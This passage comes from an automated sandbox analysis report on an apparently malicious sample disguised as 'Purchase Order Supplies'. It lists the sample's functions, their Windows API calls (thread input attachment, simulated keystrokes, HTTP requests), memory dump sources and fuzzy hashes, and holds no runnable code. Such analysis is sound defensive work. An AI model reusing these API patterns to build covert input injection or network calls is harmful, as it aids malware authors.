                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 1426640281-0
                          • Opcode ID: 6a5ca23b72676b135e5facdbd4eb702a09ebf2608bca63a8fbbcd12158261324
                          • Instruction ID: 283a1685ea52f69b32eb09a24fccb0ac1286953d434005d2a119c90fe941c24b
                          • Opcode Fuzzy Hash: 6a5ca23b72676b135e5facdbd4eb702a09ebf2608bca63a8fbbcd12158261324
                          • Instruction Fuzzy Hash: E781AF719047458FDB24CF68C8806E9BBB0AF49324F24425DD8A6EB3D1CBB49D03DB64
                          Function 00CD7212 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                          Download Yara Rule
                          APIs
                          • __swprintf.LIBCMT ref: 00CD7226
                          • __swprintf.LIBCMT ref: 00CD7233
                            • Part of subcall function 00CB234B: __woutput_l.LIBCMT ref: 00CB23A4
                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00CD725D
                          • LoadResource.KERNEL32(?,00000000), ref: 00CD7269
                          • LockResource.KERNEL32(00000000), ref: 00CD7276
                          • FindResourceW.KERNEL32(?,?,00000003), ref: 00CD7296
                          • LoadResource.KERNEL32(?,00000000), ref: 00CD72A8
                          • SizeofResource.KERNEL32(?,00000000), ref: 00CD72B7
                          • LockResource.KERNEL32(?), ref: 00CD72C3
                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00CD7322
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                          • String ID:
                          • API String ID: 1433390588-0
                          • Opcode ID: 4b418d8363f07779efe0032eba4fcebb8a87fc01d5c85b5b836f19f73fd80dc5
                          • Instruction ID: f627a9c44ecc5154a7de677fd65f345bb7dfb2f677a42aff47b0a12a6b52e527
                          • Opcode Fuzzy Hash: 4b418d8363f07779efe0032eba4fcebb8a87fc01d5c85b5b836f19f73fd80dc5
                          • Instruction Fuzzy Hash: EB318EB190435ABBDB019F61DC49AEB7BA9FF04341F008516FE21D2360E734DA51DAB4
                          Function 00CD4A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00CD4A7D
                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00CD3AD7,?,00000001), ref: 00CD4A91
                          • GetWindowThreadProcessId.USER32(00000000), ref: 00CD4A98
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CD3AD7,?,00000001), ref: 00CD4AA7
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD4AB9
                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00CD3AD7,?,00000001), ref: 00CD4AD2
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CD3AD7,?,00000001), ref: 00CD4AE4
                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00CD3AD7,?,00000001), ref: 00CD4B29
                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00CD3AD7,?,00000001), ref: 00CD4B3E
                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00CD3AD7,?,00000001), ref: 00CD4B49
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                          • String ID:
                          • API String ID: 2156557900-0
                          • Opcode ID: 735e1aad46a7668289c1e93fbeedab49799ebd4e9f4bae59742f5f604a9fec38
                          • Instruction ID: c9df6d273622c882493cc8a61f7ac5c354adb17803da3dd6892ad5c61f6abc2c
                          • Opcode Fuzzy Hash: 735e1aad46a7668289c1e93fbeedab49799ebd4e9f4bae59742f5f604a9fec38
                          • Instruction Fuzzy Hash: FB31AC71600708BBDB159B14DC89BAAB7AAAB60356F14811BFB18D7390D7B4DE418F70
                          Function 00D0EC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetClientRect.USER32(?), ref: 00D0EC32
                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00D0EC49
                          • GetWindowDC.USER32(?), ref: 00D0EC55
                          • GetPixel.GDI32(00000000,?,?), ref: 00D0EC64
                          • ReleaseDC.USER32(?,00000000), ref: 00D0EC76
                          • GetSysColor.USER32(00000005), ref: 00D0EC94
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                          • String ID:
                          • API String ID: 272304278-0
                          • Opcode ID: 3e17e93691272db30b28dab72f6839eedea63056f1505fbedad06e45615b0e41
                          • Instruction ID: f765497cd2c1161fb2440840da69fb26f5cca5d7b182cc9b5793843ec60e68a8
                          • Opcode Fuzzy Hash: 3e17e93691272db30b28dab72f6839eedea63056f1505fbedad06e45615b0e41
                          • Instruction Fuzzy Hash: CC215E71500305BFEB215BB4EC48BE97B76EB05325F148624FA2AD51E2DB310A42DF31
                          Function 00CCD978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                          Download Yara Rule
                          APIs
                          • EnumChildWindows.USER32(?,00CCDD46), ref: 00CCDC86
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ChildEnumWindows
                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                          • API String ID: 3555792229-1603158881
                          • Opcode ID: d947ab6b6e047c67c67fbbe63a8608b78b3b2eb64f8d8efabba99de120db0f41
                          • Instruction ID: ca8a1d80302e8678b3b42579b45af794f5ec366ac11ac0047d07c6c9de64a5cf
                          • Opcode Fuzzy Hash: d947ab6b6e047c67c67fbbe63a8608b78b3b2eb64f8d8efabba99de120db0f41
                          • Instruction Fuzzy Hash: 1E919430900506ABCB08DF64C4D1FE9FB75BF05354F54816DE86BA7291DF306A5AEBA0
                          Function 00C945A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                          Download Yara Rule
                          APIs
                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C945F0
                          • CoUninitialize.COMBASE ref: 00C94695
                          • UnregisterHotKey.USER32(?), ref: 00C947BD
                          • DestroyWindow.USER32(?), ref: 00D05936
                          • FreeLibrary.KERNEL32(?), ref: 00D0599D
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D059CA
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                          • String ID: close all
                          • API String ID: 469580280-3243417748
                          • Opcode ID: 70adc14475aebc7084d40830ca0aaf6f9d8f2fc2ee4a1e977862602df8f35bf8
                          • Instruction ID: 03848c4b2bedfb88dbc13279c5d273f4bf21da641e77a29ee6126ddddec6e3bc
                          • Opcode Fuzzy Hash: 70adc14475aebc7084d40830ca0aaf6f9d8f2fc2ee4a1e977862602df8f35bf8
                          • Instruction Fuzzy Hash: 7D914B34600602DFCB19EF24D899F69F3A4FF15705F5442A9E44AA72A2DB30AE5BDF10
                          Function 00CAC24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                          Download Yara Rule
                          APIs
                          • SetWindowLongW.USER32(?,000000EB), ref: 00CAC2D2
                            • Part of subcall function 00CAC697: GetClientRect.USER32(?,?), ref: 00CAC6C0
                            • Part of subcall function 00CAC697: GetWindowRect.USER32(?,?), ref: 00CAC701
                            • Part of subcall function 00CAC697: ScreenToClient.USER32(?,?), ref: 00CAC729
                          • GetDC.USER32 ref: 00D0E006
                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D0E019
                          • SelectObject.GDI32(00000000,00000000), ref: 00D0E027
                          • SelectObject.GDI32(00000000,00000000), ref: 00D0E03C
                          • ReleaseDC.USER32(?,00000000), ref: 00D0E044
                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00D0E0CF
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                          • String ID: U
                          • API String ID: 4009187628-3372436214
                          • Opcode ID: e2f136b28c1dca7a3c74131f3efdfc2ab10b793338e020bc2e98cea3909f26b2
                          • Instruction ID: 3ce08be333a2c185af1e19c9775f07c04dcccc211a8a5555707af6af1e3e4418
                          • Opcode Fuzzy Hash: e2f136b28c1dca7a3c74131f3efdfc2ab10b793338e020bc2e98cea3909f26b2
                          • Instruction Fuzzy Hash: 0971A23150020AEFCF218FA4C884BEA7BB5FF49354F188669ED999A2E5C7318C41DB71
                          Function 00CE4C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CE4C5E
                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00CE4C8A
                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00CE4CCC
                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00CE4CE1
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CE4CEE
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00CE4D1E
                          • InternetCloseHandle.WININET(00000000), ref: 00CE4D65
                            • Part of subcall function 00CE56A9: GetLastError.KERNEL32(?,?,00CE4A2B,00000000,00000000,00000001), ref: 00CE56BE
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                          • String ID:
                          • API String ID: 1241431887-3916222277
                          • Opcode ID: 972d1b85502c13fc8973963ebbbb7e1a97611c47d4d199d21a18801e5c046908
                          • Instruction ID: 7ba305c368a824b623078f8b7ad109a50a20e4687e5de32b894477d43909a3b8
                          • Opcode Fuzzy Hash: 972d1b85502c13fc8973963ebbbb7e1a97611c47d4d199d21a18801e5c046908
                          • Instruction Fuzzy Hash: C841AFB1501258BFEB168F62CC89FFA77ACEF08314F108116FA119A191DB749A419BA0
                          Function 00CEBAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00D2DBF0), ref: 00CEBBA1
                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00D2DBF0), ref: 00CEBBD5
                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CEBD33
                          • SysFreeString.OLEAUT32(?), ref: 00CEBD5D
                          • StringFromGUID2.COMBASE(?,?,00000028), ref: 00CEBEAD
                          • ProgIDFromCLSID.COMBASE(?,?), ref: 00CEBEF7
                          • CoTaskMemFree.COMBASE(?), ref: 00CEBF14
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                          • String ID:
                          • API String ID: 793797124-0
                          • Opcode ID: 8873afc37b445275551390dae6db522afa8de580283bf046716514093be69572
                          • Instruction ID: 795a6aa4d6ed44c5459fe11fc18af9449d7a4ad42584d29eb122b810d851a52b
                          • Opcode Fuzzy Hash: 8873afc37b445275551390dae6db522afa8de580283bf046716514093be69572
                          • Instruction Fuzzy Hash: 0DF10A75A00209EFCB04DFA5C884EBEB7B9FF89314F108499F915AB250DB31AE42DB50
                          Function 00CAB86E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C949CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C94954,00000000), ref: 00C94A23
                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00CAB85B), ref: 00CAB926
                          • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00CAB85B,00000000,?,?,00CAAF1E,?,?), ref: 00CAB9BD
                          • DestroyAcceleratorTable.USER32(00000000), ref: 00D0E775
                          • DeleteObject.GDI32(00000000), ref: 00D0E7EB
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                          • String ID:
                          • API String ID: 2402799130-0
                          • Opcode ID: db30ccf56cffee236ec4db84bbe2791f97ca795c745b3c3cd234084cc6236a8d
                          • Instruction ID: 6d44327af4aa2374b30664d08081105345aaa2d9252bfdda9aba76f080f3b829
                          • Opcode Fuzzy Hash: db30ccf56cffee236ec4db84bbe2791f97ca795c745b3c3cd234084cc6236a8d
                          • Instruction Fuzzy Hash: 3661CF34100702EFDB359F25D888B26BBF5FF86316F144A19E59A867B1CB71AC81DB60
                          Function 00CFB14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                          Download Yara Rule
                          APIs
                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CFB204
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: InvalidateRect
                          • String ID:
                          • API String ID: 634782764-0
                          • Opcode ID: 8c4253d6d83a068bddb90f6eeb42de844f338316501d4e59233cddbc81aef87e
                          • Instruction ID: b3c5fbebfe132562c328c4f022c7d478196ec928b61fe9c9aba98f6feef8d8ee
                          • Opcode Fuzzy Hash: 8c4253d6d83a068bddb90f6eeb42de844f338316501d4e59233cddbc81aef87e
                          • Instruction Fuzzy Hash: A651D33064020DBFEF609F29CC89BBE7B65AB06314F208111FB25D62B1CB71EE449B52
                          Function 00CAA599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00D0E9EA
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D0EA0B
                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00D0EA20
                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00D0EA3D
                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00D0EA64
                          • DestroyCursor.USER32(00000000), ref: 00D0EA6F
                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00D0EA8C
                          • DestroyCursor.USER32(00000000), ref: 00D0EA97
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CursorDestroyExtractIconImageLoadMessageSend
                          • String ID:
                          • API String ID: 3992029641-0
                          • Opcode ID: 8f9e391bfbbe7d3761836341f9ad2c8c6c9e9eb0f8824529f5303a05f62c9cd0
                          • Instruction ID: 7234b6e070518d50e781a84681ae58efc8e92e9e9650be9f79f782b210201f36
                          • Opcode Fuzzy Hash: 8f9e391bfbbe7d3761836341f9ad2c8c6c9e9eb0f8824529f5303a05f62c9cd0
                          • Instruction Fuzzy Hash: F5515974A0030AAFDB20CF65CC81BAA7BB5AB49754F144619F956D72D0DB70ED80DF60
                          Function 00CAF6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00D0E9A0,00000004,00000000,00000000), ref: 00CAF737
                          • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00D0E9A0,00000004,00000000,00000000), ref: 00CAF77E
                          • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00D0E9A0,00000004,00000000,00000000), ref: 00D0EB55
                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00D0E9A0,00000004,00000000,00000000), ref: 00D0EBC1
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ShowWindow
                          • String ID:
                          • API String ID: 1268545403-0
                          • Opcode ID: b6deaba3515353f78c41da735d23358ab8f843901fed75ce5c9fb7c8492ab519
                          • Instruction ID: 93da5794be4a28b28dfc8fe58611efeaa1388a5e9c10f995446b77a9a6d21258
                          • Opcode Fuzzy Hash: b6deaba3515353f78c41da735d23358ab8f843901fed75ce5c9fb7c8492ab519
                          • Instruction Fuzzy Hash: 29411F30204786AADB3557798CC8B7A7B966B47309F684C2DF09BC25A1CB70E843D731
                          Function 00CCCDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CCE158
                            • Part of subcall function 00CCE138: GetCurrentThreadId.KERNEL32 ref: 00CCE15F
                            • Part of subcall function 00CCE138: AttachThreadInput.USER32(00000000,?,00CCCDFB,?,00000001), ref: 00CCE166
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CCCE06
                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00CCCE23
                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00CCCE26
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CCCE2F
                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00CCCE4D
                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00CCCE50
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CCCE59
                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00CCCE70
                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00CCCE73
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                          • String ID:
                          • API String ID: 2014098862-0
                          • Opcode ID: 66936b3e0f98473ddf6d5d7288da5945b16d0e6142b8602339d8fd62b2d7e600
                          • Instruction ID: 27aee81e824ebf3a61c997215f2c3ba7a7be8c5cde631b364c27adf15771e10e
                          • Opcode Fuzzy Hash: 66936b3e0f98473ddf6d5d7288da5945b16d0e6142b8602339d8fd62b2d7e600
